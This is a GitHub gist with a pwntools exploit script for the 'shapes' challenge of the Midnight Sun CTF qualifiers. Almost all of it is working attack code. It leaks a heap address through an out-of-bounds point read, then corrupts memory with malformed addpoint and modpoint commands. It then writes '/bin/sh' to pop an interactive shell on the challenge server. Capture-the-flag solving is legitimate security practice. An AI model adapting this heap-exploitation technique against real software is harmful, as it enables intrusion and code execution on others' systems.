Skip to content

Instantly share code, notes, and snippets.

@d4rk-kn1gh7
Last active April 20, 2021 17:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save d4rk-kn1gh7/b2510b805018e1a5b1a1c3c51bd81ef4 to your computer and use it in GitHub Desktop.
Save d4rk-kn1gh7/b2510b805018e1a5b1a1c3c51bd81ef4 to your computer and use it in GitHub Desktop.
midnightsunquals - shapes
#!/usr/bin/python3
from pwn import *
import sys
remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111
binary = './chall'
brkpts = '''
'''
elf = ELF("chall")
context.terminal = ['tmux', 'splitw', '-h']
context.arch = "amd64"
context.log_level = "debug"
re = lambda a: io.recv(a)
reu = lambda a: io.recvuntil(a)
rl = lambda: io.recvline()
s = lambda a: io.send(a)
sl = lambda a: io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)
sa = lambda a,b: io.sendafter(a,b)
uu64 = lambda a: u64(a.ljust(8,"\x00"))
if len(sys.argv) > 1:
io = remote(remote_ip, port)
context.noptrace = True
else:
io = process(binary)
def send(cmd):
asBytes = cmd.encode()
s(len(asBytes).to_bytes(1,"big")+asBytes)
if __name__ == "__main__":
for i in range(2):
send("create,polygon")
send("addpoint,1,{},{}".format(0x1234, 0x5678))
for i in range(9):
send("create,polygon")
send("create,circle")
send("circlesize,1+1,{}".format(0x200))
send("getpoint,1,13")
reu("Point 13 = ")
data = rl().decode().split(", ")
heap = int(data[0]) + (int(data[1]) << 32) - 0x10
log.info("heap -> "+hex(heap))
binsh = u64("/bin/sh\x00")
lower = binsh & 0xffffffff
upper = binsh >> 32
for i in range(8):
send("addpoint,3,1,1")
gdb.attach(io)
send("modpoint,1,{},{},{}".format(172, heap+0x11e70, heap >> 32))
send("addpoint,4+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++,1,1")
send("addpoint,2+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++,{},{}".format(lower, upper))
send('print')
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment